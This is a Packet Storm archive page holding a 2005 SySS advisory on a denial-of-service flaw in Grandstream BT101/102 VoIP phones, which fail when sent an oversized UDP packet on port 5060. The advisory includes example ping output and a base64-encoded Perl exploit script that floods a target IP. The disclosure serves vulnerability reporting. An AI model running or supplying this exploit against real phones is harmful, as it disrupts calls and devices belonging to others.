what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Grandstream.txt

Grandstream.txt
Posted Aug 13, 2005
Authored by Pierre Kroma

It is possible to denial of service the Grandstream Budge Tone 101/102 VOIP phone by sending a UDP packet greater than 65534 bytes to port 5060.

tags | advisory, denial of service, udp
SHA-256 | 971cc3bd262ee40b619f72fff70b663892cee3f5753cc1d34ac499a8a70ac909

Grandstream.txt

Change Mirror Download
--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

- -------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
- -------------------------------------------------------------------

Problem discovered: July 20th 2005
Vendor contacted: July 21th 2005
Advisory will published on: August 12th 2005

AUTHOR: Pierre Kroma (kroma@syss.de)
SySS GmbH
72070 Tuebingen / Germany
Tel.: +49-7071-407856-0
Key fingerprint =3D 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC

DEVICE: Grandstream Budge Tone-101
Grandstream Budge Tone-102
AFFECTED VERSIONS: perhaps all(?) <=3D 1.0.6.7 (firmware 1.0.6.7 tested)

EXPLOIT: attached
VENDOR STATUS: informed
SEVERITY: medium
Remotely exploitable: yes

DESCRIPTION:
It is possible to initiate a D.o.S attack against this voip
(hardware-)phone. If you send an UDP packet greater than 65534 bytes=20
to port 5060 the device stops working:

- any active telephone call will be aborted.
- the display will show nothing / display freeze.
- the integrated HTTP-server won't be reachable any more.

To solve the problem, you must switch the phone off and on again.

If you send a packet of exactly 65534 bytes the device may reboot.
Smaller packets have no effect.

############################################################################
EXAMPLE:
Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)

ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D1 ttl=3D250 time=3D0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D2 ttl=3D250 time=3D0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D3 ttl=3D250 time=3D0.404 ms

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev =3D 0.404/0.429/0.479/0.042 ms

Wait ...

ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################

--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL
Content-Type: application/x-perl; name=grandstream-DoS.pl
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=grandstream-DoS.pl

IyEvdXNyL2Jpbi9wZXJsCiMKdXNlIElPOjpTb2NrZXQ7CnVzZSBUZXJtOjpBTlNJQ29sb3I7Cgoj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFUgUyBBIEcgRSAjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIwpzeXN0ZW0gKCJjbGVhciIpOwpwcmludCAiXG5HcmFuZHN0cmVhbSBC
VDEwMS9CVDEwMiBEb1NcbiI7CnByaW50ICJ3cml0dGVuIGJ5IHBpZXJyZSBrcm9tYSAoa3JvbWFc
QHN5c3MuZGUpXG5cbiI7CgppZiAoISRBUkdWWzJdKXsKcHJpbnQgcXF+ClVzYWdlOiBwZXJsIGdy
YW5kc3RyZWFtLURvUy5wbCAtcyA8aXAtYWRkcj4gPHVkcC1wb3J0PiB7LXIvLXN9CgoJPGlwLWFk
ZHI+ICA9IDstKQoJPHVkcC1wb3J0PiA9IDUwNjAKCgktciA9ICdyZWJvb3QnIAl0aGUgR3JhbmRz
dHJlYW0gQlQgMTAxLzEwMgoJLXMgPSAnc2h1dGRvd24nIHRoZSBHcmFuZHN0cmVhbSBCVCAxMDEv
MTAyCgp+OyBleGl0O30KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBEIEUgRiBJ
IE4gSSBUIEkgTyBOIFMjIyMjIyMjIyMjIyMjIyMjIyMjIwoKJHZpY3RpbSA9ICRBUkdWWzBdOwok
cG9ydCA9ICRBUkdWWzFdOwokb3B0aW9uID0gJEFSR1ZbMl07CgppZiAoICRvcHRpb24gPT0gJ3In
IHx8ICRvcHRpb24gPT0gJ1InICkKewkkcmVxdWVzdD0gJ2sneDY1NTM0O30KCmlmICggJG9wdGlv
biA9PSAncycgfHwgJG9wdGlvbiA9PSAnUycgKQp7CSRyZXF1ZXN0PSAncCd4NjU1MzU7fQplbHNl
CnsJcHJpbnQgIldyb25nIHBhcmFtZXRlciAtIHRyeSBpdCBhZ2FpbiI7CglleGl0Owp9CgoKIyBw
aW5nIHRoZSByZW1vdGUgZGV2aWNlCnByaW50IGNvbG9yICdib2xkIGJsdWUnOwpwcmludCAiXG5w
aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW1cbiI7CnByaW50IGNvbG9yICdyZXNldCc7CnN5
c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCnByaW50IGNvbG9yICdib2xkIHJlZCc7CnByaW50
ICJcbiBXYWl0IC4uLiBcblxuXG4iOwpwcmludCBjb2xvciAncmVzZXQnOwokc294ID0gSU86OlNv
Y2tldDo6SU5FVC0+bmV3KFByb3RvPT4idWRwIixQZWVyUG9ydD0+IiRwb3J0IixQZWVyQWRkcj0+
IiR2aWN0aW0iKTsKCnByaW50ICRzb3ggJHJlcXVlc3Q7CnNsZWVwIDE7CmNsb3NlICRzb3g7Cgoj
IHBpbmcgdGhlIHJlbW90ZSBkZXZpY2UKcHJpbnQgY29sb3IgJ2JvbGQgYmx1ZSc7CnByaW50ICJw
aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW0gYWdhaW5cbiI7CnByaW50IGNvbG9yICdyZXNl
dCc7CnN5c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCg==

--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close